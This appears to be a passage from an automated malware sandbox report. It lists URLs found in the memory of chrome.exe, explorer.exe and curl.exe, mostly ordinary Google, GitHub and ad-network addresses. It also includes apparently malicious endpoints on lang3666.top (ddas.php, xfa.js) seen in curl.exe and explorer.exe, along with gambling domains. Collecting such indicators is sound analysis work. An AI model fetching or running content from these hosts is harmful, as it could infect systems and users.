Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#dropdowns
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#modals
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#popovers
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#scrollspy
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tabs
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tooltip
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#transitions
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/angular/angular.js/blob/v1.4.4/src/ng/urlUtils.js
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L53
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L58
Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330812480.000028EC05D3B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329254218.000028EC06CF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/malsup/cycle/issues/44
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/twbs/bootstrap/issues/14093
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/twbs/bootstrap/issues/20280
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467386602.000028EC02248000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/pagead/form-data
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355904920.000028EC07C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grack.com/blog/2009/11/17/absolutizing-url-in-javascript
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://gunosy.com
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/default.webp
Source: chrome.exe, 00000000.00000003.2330399294.000028EC053E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330280472.000028EC06B23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329480790.000028EC06A94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/hqdefault.webp
Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/mqdefault.webp
Source: chrome.exe, 00000000.00000003.2378086246.000028EC080B2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375308476.000028EC06B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi_webp/h15NcT6UXh0/maxresdefault.webp
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://ingereck.net
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jnn-pa.googleapis.com
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT(z
Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494396786.000028EC04574000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://juice-bet.com/
Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://juicebet-bookmaker.com/
Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://kompaspublishing.nl
Source: chrome.exe, 00000000.00000002.2443190026.000001E4AFD84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006DE5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006EC5000.00000004.00000001.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778739442.000001366F8DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778789152.000001366F90B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778353998.000001366F8D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1777943451.000001366F908000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778212265.000001366F90B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lang3666.top/lv/ddas.php
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490969003.000028EC04018000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507173491.000028EC07D3C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://lang3666.top/lv/xfa.js
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T0
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.youtube.com
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478797391.000028EC03124000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://metro.co.uk
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://modernizr.com/)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyn
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385578188.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302407484.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468568226.000028EC0231C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://nexxen.tech
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000000.00000002.2468779957.000028EC02354000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://open-bid.com
Source: chrome.exe, 00000000.00000003.2301920756.000028EC04738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302499245.000028EC027CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/ccm/collect
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/pagead/conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
